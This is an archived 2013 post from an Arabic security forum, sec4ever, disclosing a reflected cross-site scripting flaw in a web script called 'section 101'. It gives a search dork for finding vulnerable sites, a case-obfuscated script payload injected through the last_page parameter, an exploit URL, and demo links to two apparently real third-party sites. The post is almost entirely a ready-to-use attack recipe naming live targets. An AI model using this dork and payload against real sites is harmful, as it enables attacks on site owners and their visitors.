الحماية للأبد -Security 4 Ever

الحماية للأبد -Security 4 Ever (https://www.sec4ever.com/home/index.php)
-   قسم جديد ثغرات الأعضاء (https://www.sec4ever.com/home/forumdisplay.php?f=60)
-   -   xss on section 101 script (https://www.sec4ever.com/home/showthread.php?t=13971)

Hamza-xDz 11-12-2013 05:09 PM

xss on section 101 script
 
************************************************** **
xss on section 101 script
by hamza killer
sec4ever
dork:inurl:news_archive?Press_Page_Width
payload:
news_archive?Press_Page_Width=750&last_page="><SCr IpT>alert(by hamza killer)<%2FScRiPt>&page=news_item

exploit:www.site.com/news_archive?Press_Page_Width=750&last_page="><SCr IpT>alert(23393)<%2FScRiPt>&page=news_item

demo:
http://bushofficial.com/news_archive...page=news_item
http://jamesmaddock.net/news_archive...page=news_item


الساعة الآن 03:33 AM

Powered by vBulletin® Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.